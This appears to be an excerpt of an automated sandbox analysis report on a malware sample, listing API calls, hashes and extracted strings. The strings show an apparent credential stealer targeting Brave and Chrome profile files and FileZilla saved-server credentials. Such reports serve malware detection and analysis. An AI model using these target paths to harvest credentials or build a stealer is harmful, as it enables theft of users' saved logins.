                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000AE06E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE09A
                                    • StrCmpCA.SHLWAPI(?,Brave), ref: 000AE0CD
                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 000AE0E7
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AE11F
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000AE12E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE155
                                    • lstrcat.KERNEL32(00000000,?), ref: 000AE15D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE19F
                                    • lstrcat.KERNEL32(00000000), ref: 000AE1A9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE1D0
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 000AE1F9
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AE22F
                                    • lstrlen.KERNEL32(00E68980), ref: 000AE23D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE261
                                    • lstrcat.KERNEL32(00000000,00E68980), ref: 000AE269
                                    • lstrlen.KERNEL32(\Brave\Preferences), ref: 000AE274
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE29B
                                    • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 000AE2A7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE2CF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE30F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE349
                                    • DeleteFileA.KERNEL32(?), ref: 000AE381
                                    • StrCmpCA.SHLWAPI(?,00E6CDA0), ref: 000AE3AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE3F4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE41C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE445
                                    • StrCmpCA.SHLWAPI(?,00E689D0), ref: 000AE468
                                    • StrCmpCA.SHLWAPI(?,00E68A60), ref: 000AE47D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE4D9
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000AE4E0
                                    • StrCmpCA.SHLWAPI(?,00E6CCF8), ref: 000AE58E
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AE5C4
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 000AE639
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE678
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE6A1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE6C7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE70E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE737
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE75C
                                    • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 000AE776
                                    • DeleteFileA.KERNEL32(?), ref: 000AE7D2
                                    • StrCmpCA.SHLWAPI(?,00E688D0), ref: 000AE7FC
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE88C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE8B5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE8EE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE916
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 2635522530-726946144
                                    • Opcode ID: 03156f66abc69c92b6c1ef1b350242818f3ded89f6a341d47a13f78ec9978d53
                                    • Instruction ID: adc8e7a8f560adb25d46b1f12dce205e66438b686238e2151fceea863571e870
                                    • Opcode Fuzzy Hash: 03156f66abc69c92b6c1ef1b350242818f3ded89f6a341d47a13f78ec9978d53
                                    • Instruction Fuzzy Hash: C1928C71E112169FCB60EFB8EC89AEE77F9AF45300F044529F84AA7652DB34DC458B90
                                    Function 000B18A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B18D2
                                    • lstrlen.KERNEL32(\*.*), ref: 000B18DD
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B18FF
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 000B190B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1932
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B1947
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000B1967
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000B1981
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B19BF
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B19F2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1A1A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B1A25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1A4C
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1A5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1A80
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1A8C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1AB4
                                    • lstrlen.KERNEL32(?), ref: 000B1AC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1AE5
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B1AF3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1B19
                                    • lstrlen.KERNEL32(00E687F0), ref: 000B1B2F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1B59
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B1B64
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1B8F
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1BA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1BC3
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1BCF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1BF8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1C25
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B1C30
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1C57
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1C69
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1C8B
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1C97
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1CC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1CEF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B1CFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1D21
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1D33
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1D55
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1D61
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1D8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1DB9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B1DC4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1DED
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1E19
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1E36
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1E42
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1E68
                                    • lstrlen.KERNEL32(00E6CD70), ref: 000B1E7E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1EB2
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1EC6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1EE3
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1EEF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1F15
                                    • lstrlen.KERNEL32(00E6D1A8), ref: 000B1F2B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1F5F
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1F73
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1F90
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1F9C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1FC2
                                    • lstrlen.KERNEL32(00E5B1D0), ref: 000B1FD8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2000
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B200B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2036
                                    • lstrlen.KERNEL32(000D1794), ref: 000B2048
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2067
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B2073
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2098
                                    • lstrlen.KERNEL32(?), ref: 000B20AC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B20D0
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B20DE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2103
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B213F
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000B214E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2176
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B2181
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                    • String ID: \*.*
                                    • API String ID: 712834838-1173974218
                                    • Opcode ID: 071883dacfbd7266514c5b248a8125e2edb089970d6eb957d0983d17b241912c
                                    • Instruction ID: 4a198bf7ea5d4dac4f2e6fd42b53b1d347439d2078286f7252137290ead8deae
                                    • Opcode Fuzzy Hash: 071883dacfbd7266514c5b248a8125e2edb089970d6eb957d0983d17b241912c
                                    • Instruction Fuzzy Hash: 81627F31A12616ABCB21EFA8DC58AEF77F9AF51700F440139F805A7662DB34DD41CBA1
                                    Function 000B3910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 000B392C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000B3943
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000B396C
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000B3986
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B39BF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B39E7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B39F2
                                    • lstrlen.KERNEL32(000D1794), ref: 000B39FD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3A1A
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3A26
                                    • lstrlen.KERNEL32(?), ref: 000B3A33
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3A53
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B3A61
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3A8A
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B3ACE
                                    • lstrlen.KERNEL32(?), ref: 000B3AD8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3B05
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3B10
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3B36
                                    • lstrlen.KERNEL32(000D1794), ref: 000B3B48
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3B6A
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3B76
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3B9E
                                    • lstrlen.KERNEL32(?), ref: 000B3BB2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3BD2
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B3BE0
                                    • lstrlen.KERNEL32(00E68980), ref: 000B3C0B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3C31
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3C3C
                                    • lstrlen.KERNEL32(00E687F0), ref: 000B3C5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3C84
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3C8F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3CB7
                                    • lstrlen.KERNEL32(000D1794), ref: 000B3CC9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3CE8
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3CF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3D1A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B3D47
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3D52
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3D79
                                    • lstrlen.KERNEL32(000D1794), ref: 000B3D8B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3DAD
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3DB9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3DE2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3E11
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3E1C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3E43
                                    • lstrlen.KERNEL32(000D1794), ref: 000B3E55
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3E77
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3E83
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3EAC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3EDB
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3EE6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3F0D
                                    • lstrlen.KERNEL32(000D1794), ref: 000B3F1F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3F41
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3F4D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3F75
                                    • lstrlen.KERNEL32(?), ref: 000B3F89
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3FA9
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B3FB7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3FE0
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B401F
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000B402E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4056
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B4061
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B408A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B40CE
                                    • lstrcat.KERNEL32(00000000), ref: 000B40DB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000B42D9
                                    • FindClose.KERNEL32(00000000), ref: 000B42E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 1006159827-1013718255
                                    • Opcode ID: f7329e20c540061de5b69c59cbc7895b962589cb33649399dc12905472ffd4a5
                                    • Instruction ID: 63de3766b0eaf00e5346476a01141e65e8ff855589b2c589dd17c39cc0600890
                                    • Opcode Fuzzy Hash: f7329e20c540061de5b69c59cbc7895b962589cb33649399dc12905472ffd4a5
                                    • Instruction Fuzzy Hash: 7262A031E11616ABCB21EFA8EC4DAEE77F9AF51700F144129F805A7662DB34DE41CB90
                                    Function 000B6960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6995
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 000B69C8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6A02
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6A29
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B6A34
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6A5D
                                    • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 000B6A77
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6A99
                                    • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 000B6AA5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6AD0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6B00
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000B6B35
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6B9D
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6BCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 313953988-555421843
                                    • Opcode ID: a676be337cc8d0f7ce4b6383f42b7a9e3e78e8cd6b4e7d0be6ce0e5d1ecf404d
                                    • Instruction ID: f2d0c2e902661a0a91fdc6ccd53788695d7242ce1777a21bf58189d039b4308a
                                    • Opcode Fuzzy Hash: a676be337cc8d0f7ce4b6383f42b7a9e3e78e8cd6b4e7d0be6ce0e5d1ecf404d
                                    • Instruction Fuzzy Hash: 23427E30E01216ABDB11EBB8EC49EEE7BB9AF55700F044429F905EB252DB39DD41CB60
                                    Function 000ADB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADBC1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADBE4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADBEF
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000ADBFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADC17
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000ADC23
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADC4C
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADC8F
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADCBF
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000ADCD0
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000ADCF0
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000ADD0A
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000ADD1D
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADD47
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADD70
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADD7B
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADD86
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADDA3
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADDAF
                                    • lstrlen.KERNEL32(?), ref: 000ADDBC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADDDF
                                    • lstrcat.KERNEL32(00000000,?), ref: 000ADDED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADE19
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADE3D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000ADE6F
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADE7B
                                    • lstrlen.KERNEL32(00E68A60), ref: 000ADE8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADEB0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADEBB
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADEC6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000ADEE6
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADEF2
                                    • lstrlen.KERNEL32(00E689D0), ref: 000ADF01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADF27
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADF32
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADF5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADFA5
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADFB1
                                    • lstrlen.KERNEL32(00E68A60), ref: 000ADFC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADFE9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADFF4
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADFFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE022
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000AE02E
                                    • lstrlen.KERNEL32(00E689D0), ref: 000AE03D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE063
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000AE06E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE09A
                                    • StrCmpCA.SHLWAPI(?,Brave), ref: 000AE0CD
